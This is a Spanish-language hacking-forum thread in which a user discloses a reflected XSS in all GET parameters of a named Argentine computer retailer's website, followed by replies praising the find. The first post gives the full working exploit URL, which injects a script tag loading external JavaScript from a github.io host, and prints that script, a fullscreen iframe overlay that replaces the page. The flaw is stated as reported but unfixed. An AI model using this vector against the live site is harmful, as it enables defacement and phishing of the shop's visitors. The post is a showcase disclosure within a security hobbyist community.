Underc0de

¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).

• Imagen:[/b][/color]
  

  Citar(http://slowtestlab.netne.net/showoff/aikencomputacion/aiken.png)

  
  
  • URL:[/b][/color] http://www.aikencomputacion.com.ar/ (http://www.aikencomputacion.com.ar/)
    
    • Vector utilizado:[/b][/color] <script src=https://nobodytl.github.io/codes/js/iframe.js></script>
      
      • Variables vulnerables:[/b][/color] Todos los GET de la web.
        
        • Reportado:[/b][/color] SI (no reparado).
          
          En definitiva, el vector final sería: http://aikencomputacion.com.ar/index.php?clase=categoria&q=<script src=https://nobodytl.github.io/codes/js/iframe.js></script> (http://aikencomputacion.com.ar/index.php?clase=categoria&q=<script%20src=https://nobodytl.github.io/codes/js/iframe.js></script>)
          
          El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.
          
          
          Código [Seleccionar] Expandir
          document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");
          
          ¡Saludos!

Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.

Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.

 ;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.

Gracias por avisar, voy a dejar de usar Google Drive como host jaja, imagen re subida.
¡Gracias!
(P.D.: Me daba error al modificar, una linda blank page :/ jaja).

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.

Si, ya se solucionó :-) Gracias por repararlo :P
Gracias, seguriás viendo aportes míos :P jaja

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud

Jaja, no se como llegué a esto (? xD
Jaja gracias, ¡saludos!